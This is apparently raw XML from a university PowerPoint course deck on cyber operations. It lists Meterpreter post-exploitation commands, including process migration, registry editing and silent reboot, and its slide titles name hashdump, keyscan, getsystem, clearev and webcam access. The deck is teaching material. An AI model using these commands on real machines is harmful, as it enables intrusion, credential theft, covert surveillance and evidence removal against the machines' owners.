            <a:ext cx="67374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5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a Meterpreter Shell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74" y="1825625"/>
            <a:ext cx="5930452" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331256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View and modify the networking routing table of the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; route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371850"/>
            <a:ext cx="42079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9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Remotely edit the registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; reg &lt;command&gt; &lt;option&gt;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3058994"/>
            <a:ext cx="4398461" cy="28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63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Puts the meterpreter session in background mode </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sessions –l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>used to ID the current sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sessions –I &lt;session_id&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>used to move back into the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46536"/>
            <a:ext cx="4255047" cy="17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Reboot/shutdown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reboot: reboots the machine with no warning to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; reboot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shutdown: Shuts the machine down with no warning to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; shutdown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69" y="2598738"/>
            <a:ext cx="203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34" y="4102100"/>
            <a:ext cx="285230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3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Provides information about the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; sysinfo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29050"/>
            <a:ext cx="5693636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32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 all running processes (on the target)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71750"/>
            <a:ext cx="526590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command kills a process, specified by a PID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; kill &lt;pid&gt;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229100"/>
            <a:ext cx="3133508" cy="7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command is used to migrate to other process ids (PIDs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; migrate &lt;pid&gt;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69" y="4464845"/>
            <a:ext cx="4603781" cy="119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7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Grabs the PID of the process you are currently attached to. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; getpid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3911203"/>
            <a:ext cx="3653651" cy="12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8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Obtain the username responsible for the current process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; getuid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400550"/>
            <a:ext cx="570323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40467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2125</TotalTime>
  <Words>1904</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>302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Mangal</vt:lpstr>
      <vt:lpstr>PP_C5Modules_CC_License_standard</vt:lpstr>
      <vt:lpstr>Cyber Operations </vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>Getting a Meterpreter Shell</vt:lpstr>
      <vt:lpstr>sysinfo</vt:lpstr>
      <vt:lpstr>ps</vt:lpstr>
      <vt:lpstr>kill</vt:lpstr>
      <vt:lpstr>migrate</vt:lpstr>
      <vt:lpstr>getpid</vt:lpstr>
      <vt:lpstr>getuid</vt:lpstr>
      <vt:lpstr>Keyscan</vt:lpstr>
      <vt:lpstr>uictl</vt:lpstr>
      <vt:lpstr>screenshot</vt:lpstr>
      <vt:lpstr>hashdump</vt:lpstr>
      <vt:lpstr>getsystem</vt:lpstr>
      <vt:lpstr>enumdesktops</vt:lpstr>
      <vt:lpstr>getdesktop</vt:lpstr>
      <vt:lpstr>idletime</vt:lpstr>
      <vt:lpstr>run</vt:lpstr>
      <vt:lpstr>run getgui </vt:lpstr>
      <vt:lpstr>shell</vt:lpstr>
      <vt:lpstr>clearev</vt:lpstr>
      <vt:lpstr>execute</vt:lpstr>
      <vt:lpstr>Webcams</vt:lpstr>
      <vt:lpstr>Local Directory traversal</vt:lpstr>
      <vt:lpstr>Remote File System Commands</vt:lpstr>
      <vt:lpstr>search</vt:lpstr>
      <vt:lpstr>Remote file management</vt:lpstr>
      <vt:lpstr>download</vt:lpstr>
      <vt:lpstr>upload</vt:lpstr>
      <vt:lpstr>route</vt:lpstr>
      <vt:lpstr>reg</vt:lpstr>
      <vt:lpstr>Background</vt:lpstr>
      <vt:lpstr>Reboot/shutdown</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>University of California at Davis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193</cp:revision>
  <cp:lastPrinted>2016-07-18T16:40:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-07-03T20:12:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-14T15:35:15Z</dcterms:modified>
</cp:coreProperties>
</file>